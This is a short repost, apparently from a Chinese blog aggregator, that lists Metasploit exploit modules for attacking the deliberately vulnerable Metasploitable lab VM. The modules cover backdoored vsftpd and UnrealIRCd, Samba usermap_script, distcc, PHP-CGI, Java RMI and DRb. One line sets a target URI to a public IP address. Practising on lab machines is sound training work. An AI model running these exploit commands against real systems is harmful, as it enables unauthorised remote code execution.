您的位置:首页 > 运维架构 > Linux

Exploiting Metasploitable with Metasploit in Kali Linux

2013-06-28 19:27 651 查看
use exploit/unix/irc/unreal_ircd_3281_backdoor

use exploit/unix/ftp/vsftpd_234_backdoor

use exploit/multi/http/php_cgi_arg_injection

use exploit/linux/misc/drb_remote_codeexec

set URI druby://162.212.182.20:8787

use exploit/multi/samba/usermap_script

use exploit/unix/misc/distcc_exec

use exploit/multi/misc/java_rmi_server
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: